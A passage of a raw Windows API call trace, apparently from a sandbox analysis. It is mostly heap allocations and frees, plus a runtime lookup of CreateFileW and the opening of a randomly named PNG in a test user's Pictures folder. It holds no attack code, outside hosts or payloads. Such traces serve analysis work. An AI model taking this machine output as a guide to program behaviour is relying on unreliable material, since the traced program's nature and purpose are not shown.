hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0092.422] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0092.422] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0092.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0092.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0092.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0092.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0092.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0092.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0092.422] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0092.422] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0092.422] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0092.422] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0092.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0092.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0092.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0092.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0092.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0092.422] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0092.422] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0092.422] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0092.422] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0092.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0092.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0092.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0092.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0092.422] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0092.423] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0092.423] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0092.423] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0092.423] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0092.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0092.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0092.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0092.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0092.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0092.423] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0092.423] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0092.423] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0092.423] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0092.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0092.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0092.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0092.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0092.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0092.423] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0092.423] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0092.423] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0092.423] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0092.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0092.423] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0092.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0092.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0092.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0092.424] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0092.424] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0092.424] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0092.424] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0092.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0092.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0092.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0092.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0092.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0092.424] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0092.424] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0092.424] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0092.424] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0092.424] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0092.424] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0092.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0092.425] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca988 [0092.425] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca988, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0092.425] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0092.425] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0092.425] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0092.425] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0092.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0092.425] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0092.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0092.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0092.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0092.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0092.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0092.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0092.426] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x4506008 [0092.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0092.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0092.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0092.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0092.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0092.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0092.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0092.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0092.427] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\7mFkSCM1jm586Ad_.png" (normalized: "c:\\users\\fd1hvy\\pictures\\cliksz\\7mfkscm1jm586ad_.png"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x258 [0092.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0092.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43eab80 [0092.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0092.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0092.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0092.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0092.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0092.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0092.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0092.427] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0092.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0092.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0092.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0092.427] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0092.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0092.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431de60 [0092.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4506008 | out: hHeap=0x1780000) returned 1 [0092.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0092.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0092.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0092.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0092.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0092.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0092.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0092.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0092.428] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0092.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0092.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0092.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0092.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0092.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0092.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0092.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0092.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0092.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0092.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0092.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0092.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0092.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0092.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0092.428] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0092.429] FreeLibrary (hLibModule=0x772d0000) returned 1 [0092.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0092.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0092.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0092.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0092.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0092.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0092.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0092.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0092.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0092.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0092.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0092.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0092.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0092.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0092.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0092.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0092.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0092.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0092.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0092.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0092.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0092.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0092.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0092.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0092.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0092.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0092.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0092.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0092.429] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0092.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0092.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0092.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0092.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0092.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0092.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0092.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0092.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0092.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0092.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0092.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0092.430] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 1 [0092.430] TranslateMessage (lpMsg=0x144e9a4) returned 0 [0092.430] DispatchMessageW (lpMsg=0x144e9a4) returned 0x0 [0092.430] KillTimer (hWnd=0x502d2, uIDEvent=0x1) returned 1 [0092.430] SetTimer (hWnd=0x502d2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0092.430] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0092.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea730 | out: hHeap=0x1780000) returned 1 [0092.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0092.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0092.430] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0092.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0092.430] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0092.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0092.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0092.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0092.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0092.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0092.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0092.431] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0092.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0092.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0092.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9260 | out: hHeap=0x1780000) returned 1 [0092.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca130 | out: hHeap=0x1780000) returned 1 [0092.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0092.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0092.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0092.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0092.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0092.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0092.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0092.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca160 | out: hHeap=0x1780000) returned 1 [0092.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca148 | out: hHeap=0x1780000) returned 1 [0092.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0092.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0092.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0092.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0092.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0092.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0092.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0092.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0092.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d20 | out: hHeap=0x1780000) returned 1 [0092.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0092.431] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0092.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca100 | out: hHeap=0x1780000) returned 1 [0092.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0092.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0092.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0092.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0092.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0092.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0092.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0092.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0092.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431de60 | out: hHeap=0x1780000) returned 1 [0092.432] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0092.432] HeapFree (in: hHeap=0x1780000, 